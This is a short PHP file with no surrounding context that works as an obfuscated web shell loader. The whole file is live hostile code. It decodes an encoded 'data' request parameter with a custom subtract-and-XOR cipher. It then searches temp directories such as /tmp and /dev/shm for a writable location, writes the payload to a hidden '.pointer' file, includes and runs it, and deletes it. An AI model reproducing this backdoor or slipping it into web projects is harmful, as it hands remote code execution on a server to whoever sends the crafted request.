<?php

if(isset($_REQUEST["\x64a\x74a"]) ? true : false){
	$k = $_REQUEST["\x64a\x74a"];
	$k	  = 	 explode(	 '.'	,	 $k   )	; 	 
	$rec = '';
            $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($s9 );
    
            foreach($k as $s => $v8) {$sChar = ord($s9[$s % $lenS] );
                $dec =((int)$v8 - $sChar -($s % 10))^35;
                $rec		.= chr($dec );
            }
	$resource = array_filter([getcwd(), getenv("TMP"), "/tmp", session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", getenv("TEMP")]);
	for ($itm = 0, $value = count($resource); $itm < $value; $itm++) {
    $entity = $resource[$itm];
    		if (!( !is_dir($entity) || !is_writable($entity) )) {
    $item = join("/", [$entity, ".pointer"]);
    if (file_put_contents($item, $rec)) {
	include $item;
	@unlink($item);
	die();
}
}
}
}